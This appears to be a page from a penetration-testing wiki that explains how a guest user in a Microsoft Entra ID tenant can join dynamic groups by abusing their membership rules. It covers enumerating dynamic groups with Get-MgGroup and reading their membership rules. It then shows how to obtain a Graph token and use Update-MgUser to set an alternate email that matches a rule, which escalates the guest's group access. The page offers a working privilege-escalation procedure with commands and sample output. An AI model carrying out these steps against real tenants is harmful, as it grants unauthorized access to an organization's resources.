Dynamic Groups

An organization may add users to a particular group based on their userPrincipalName, department, mail etc. By default, any user can invite guests in Entra ID. If a dynamic group rule allows adding users based on the attributes that a guest user can modify, it will result in abuse of this feature. There are two ways the rules can be abused: Before joining a tenant as guest. If we can enumerate that a property, say mail, is used in a rule, we can invite a guest with the email ID that matches the rule. After joining a tenant as guest. A guest user can 'manage their own profile', that is, they can modify manager and alternate email. We can abuse a rule that matches on Manager (Direct Reports for "{objectID_of_manager}") or alternative email (user.otherMails -any (_ -contains "string")).

Enumerate Dynamic Groups

Get-MgGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}

Look at the MemberShipRule for the dynamic group

Get-MgGroup -GroupId f6c94d79-3eed-40ca-9ba9-d9743a4a1a4e | select MembershipRule

Review rules

MembershipRule
--------------
(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")

The membership rule means that any Guest user whose secondary email contains the string 'vendor' will be added to this group.

Example updating alternative email

Connect-AzAccount -TenantId b6e0615d-2c17-46b3-922c-491c91624acd

$Token = (Get-AzAccessToken -ResourceTypeName MSGraph).Token
Connect-MgGraph -AccessToken ($Token | ConvertTo-SecureString -AsPlainText -Force)

Update-MgUser -UserId 4a3395c9-be40-44ba-aff2-be502edd9619-OtherMails vendorx@defcorpextcontractors.onmicrosoft.com

PreviousEndpoint Manager NextApplication Proxy

Last updated 3 hours ago